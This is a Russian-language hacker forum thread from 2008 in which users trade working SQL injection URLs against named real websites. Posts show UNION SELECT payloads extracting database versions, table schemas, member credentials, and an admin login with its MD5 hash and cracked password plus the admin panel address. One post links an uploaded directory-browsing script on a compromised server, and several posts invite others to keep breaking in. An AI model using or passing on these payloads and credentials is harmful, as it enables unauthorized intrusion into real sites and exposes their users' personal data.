20.09.2008, 23:23
|
|
Познающий
Регистрация: 13.04.2008
Сообщений: 42
Провел на форуме:
384537
Репутация:
35
|
|
Сообщение от FAPSI
Залил скрипт - можно пошариться по серваку 
http://www.geoimport.ge/uploads/dir.php?cd=./../../doc/admin Ща тебя пошарят немного.
Ты читал как раздел называеться ? 
Тут ток скуль иньекцыи, а шелы, фтп и прочая гадость в разделе Халява 
|
|
|
21.09.2008, 08:37
|
|
Познающий
Регистрация: 19.09.2008
Сообщений: 95
Провел на форуме:
399173
Репутация:
102
|
|
_http://www.globalsmokefreepartnership.org/news.php?id=251+order+by+4/*
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,2,3,4/*
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,version(),3,4/*
4.1.22
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,2,3,4+from+membe rs/*
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,username,email,p assword+from+members+limit+356,2/*
|
|
|
|
21.09.2008, 14:27
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573
Репутация:
185
|
|
Новая социальная сеть книголюбов BookMix.ru
Предистория: Сижу както на работе днем. Делать особо нечего. Почитываю новости, и натыкаюсь на интересный заголовок "Открылась социальная сеть книголюбов BookMix.ru".
Думаю а дайка посмотрю, че за сеть то?))
Захожу, вижу новости...в строке передается id. Первая мысль - SQL-Inj. И опа...вуоля!)))) Действительно инъект. Нехитрыми манипуляциями подбираю столбцы.
PHP код:
http://bookmix.ru/news/index.phtml?id=-48+union +select+1,2,3,4,5, 6,7,8,9,10,11/*
USER(): bookmix@localhost
DATABASE(): bookmix
VERSION(): 5.0.22
Есть доступ до information_schema, а посему поковырял таблицы, есть 2 интересные, с полями соответсвенно:
Код:
admins
-user_id
-name
-login
-pass
Код:
users
-user_id
-name
-login
-pass
-email
-icq
-skype
-description
-birthday
-showage
-sex
-phone
-howtohear
-photo
-photo_tn
-photo_tn2
-status
-regdate
-logged
-lastvisit
-referrer
-privatemessagesnotification
-friends
-reviews
-comments
-online
-regcode
-read
-ireadadddate
admins
Код:
1: pechatnick: pechatnick: 7ac2262d4ca6e2de63094a51225b00ee (stroka)
У кого есть желание, ковыряйте дальше)) |
|
|
|
21.09.2008, 14:53
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
-=Static=-, добил сайтег:
Код:
Админка тут - http://bookmix.ru/_admin/
pechatnick:stroka
Кстати много интересного
|
|
|
|
21.09.2008, 22:06
|
|
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017
Репутация:
61
|
|
Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте:
http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14/*
все кроме цифр режется почему-то. Ни одну функцию заюзать не могу.  |
|
|
|
21.09.2008, 22:46
|
|
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017
Репутация:
61
|
|
Вот ещё сайтег. При возникновении ошибки SQL выдает довольно подробный отчет по ошибке
Но внутрь я залезть что-то не смог (
http://www.boreme.com/members/viewviral.php?viral_id=18891%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12/*&siteid=55336 |
|
|
|
22.09.2008, 00:45
|
|
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017
Репутация:
61
|
|
Вот ещё сайтик. Сразу с мемберами выложил 
http://englishspectrum.net/jobkorea/findpeople.html?include=form&mode=view&id=-99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,member _id,temp_passwd,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81, 82,83,84,85,86 from english_member limit 1,1/*&lc=&sc=&mc=&pp=&gid=1&&&search_YN=Y |
|
|
|
22.09.2008, 02:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от groupby
Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте:
http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14/*
все кроме цифр режется почему-то. Ни одну функцию заюзать не могу. http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,0x76657273696F6E2829,0 x76657273696F6E2829,0x404076657273696F6E,7,8,0x766 57273696F6E2829,10,11,12,13,14/*
подстава одназначно
|
|
|
|
22.09.2008, 10:41
|
|
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017
Репутация:
61
|
|
Сообщение от Pashkela
http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,0x76657273696F6E2829,0 x76657273696F6E2829,0x404076657273696F6E,7,8,0x766 57273696F6E2829,10,11,12,13,14/*
подстава одназначно
С чего вдруг???
Если ты написал version() в 16ричном виде, то это уже не version(), а строка version(). тут никакой подставы. Тут фишка в другом совсем.
В других местах все параметры экранируются. Пробой только в этом месте. Вероятно CMS, на которой построен портал сначала сама обрабатывает урлы (режет лишнее и подозрительные слова), а потом передает дальше, в бажные скрипты ))). Скорее всего это можно обойти, но у меня вариантов пока нет.
|
|
|
|
22.09.2008, 00:03
|
|
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157
Репутация:
247
|
|
http://tid.odessa.ua/news/?newsid=-1+union+select+version(),database(),3,user(),5/*
http://tid.odessa.ua//action/?action_id=-1+union+select+version(),2,3,4/*
Ничего интересного нету
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
